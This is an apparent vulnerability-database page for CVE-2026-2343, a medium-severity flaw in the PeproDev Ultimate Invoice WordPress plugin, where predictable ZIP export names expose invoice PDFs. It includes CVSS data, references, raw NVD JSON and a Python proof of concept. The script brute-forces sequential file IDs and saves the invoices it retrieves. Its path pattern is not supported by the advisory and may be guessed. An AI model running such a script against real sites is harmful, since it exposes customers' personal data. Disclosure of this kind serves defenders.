CVE-2026-2343

Description

The PeproDev Ultimate Invoice WordPress plugin through 2.2.5 has a bulk download invoices action that generates ZIP archives containing exported invoice PDFs. The ZIP files are named predictably making it possible to brute force and retreive PII.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PeproDev Ultimate Invoice <= 2.2.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Configuration
target_domain = "http://example.com"
base_url = f"{target_domain}/wp-content/uploads/peprodev-invoices/export_"
extension = ".zip"

# Function to brute force predictable filenames
def brute_force_invoices(start_id, end_id):
    for i in range(start_id, end_id):
        # Construct predictable filename based on pattern
        filename = f"{base_url}{i}{extension}"
        try:
            response = requests.get(filename, timeout=3)
            if response.status_code == 200:
                print(f"[+] Success! Found file: {filename}")
                # Save the downloaded PII data
                with open(f"invoice_dump_{i}.zip", "wb") as f:
                    f.write(response.content)
                return True
        except requests.RequestException:
            continue
    return False

# Execute brute force
brute_force_invoices(1000, 5000)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2343
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2343
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2343/
[4] VulDB https://vuldb.com/cve/CVE-2026-2343
[5] https://wpscan.com/vulnerability/ac1572ca-7994-401d-a268-6a8773e60ab1/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2343", "sourceIdentifier": "[email protected]", "published": "2026-03-25T06:16:28.407", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PeproDev Ultimate Invoice WordPress plugin through 2.2.5 has a bulk download invoices action that generates ZIP archives containing exported invoice PDFs. The ZIP files are named predictably making it possible to brute force and retreive PII."}, {"lang": "es", "value": "El plugin de WordPress PeproDev Ultimate Invoice hasta la versión 2.2.5 tiene una acción de descarga masiva de facturas que genera archivos ZIP que contienen PDFs de facturas exportadas. Los archivos ZIP se nombran de forma predecible, lo que permite forzar por fuerza bruta y recuperar PII."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/ac1572ca-7994-401d-a268-6a8773e60ab1/", "source": "[email protected]"}]}}